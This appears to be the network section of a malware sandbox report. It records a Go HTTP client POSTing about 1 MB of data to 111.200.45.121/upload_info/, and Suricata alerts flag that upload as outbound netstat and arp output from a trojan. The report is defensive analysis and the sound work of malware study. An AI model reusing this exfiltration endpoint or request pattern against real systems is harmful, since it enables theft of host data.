Network Analysis
IP Address | Status | Action |
---|---|---|
111.200.45.121 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
TCP Requests
POST | 200 | http://111.200.45.121:80/upload_info/
REQUEST
POST /upload_info/ HTTP/1.1
Host: 111.200.45.121:80
User-Agent: Go-http-client/1.1
Content-Length: 994698
Content-Type: multipart/form-data; boundary=51535d488b3886769b89668d177bec9d3929adff1758e9e2854df67b6dc9
Accept-Encoding: gzip
RESPONSE
HTTP/1.1 200 OK
Server: nginx/1.9.9
Date: Sun, 29 Aug 2021 03:42:11 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49170 -> 111.200.45.121:80 | 2024897 | ET USER_AGENTS Go HTTP Client User-Agent | Misc activity |
TCP 192.168.56.102:49170 -> 111.200.45.121:80 | 2019003 | ET MALWARE Windows netstat Microsoft Windows DOS prompt command exit OUTBOUND | A Network Trojan was detected |
TCP 192.168.56.102:49170 -> 111.200.45.121:80 | 2019080 | ET MALWARE Windows arp -a Microsoft Windows DOS prompt command exit OUTBOUND | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts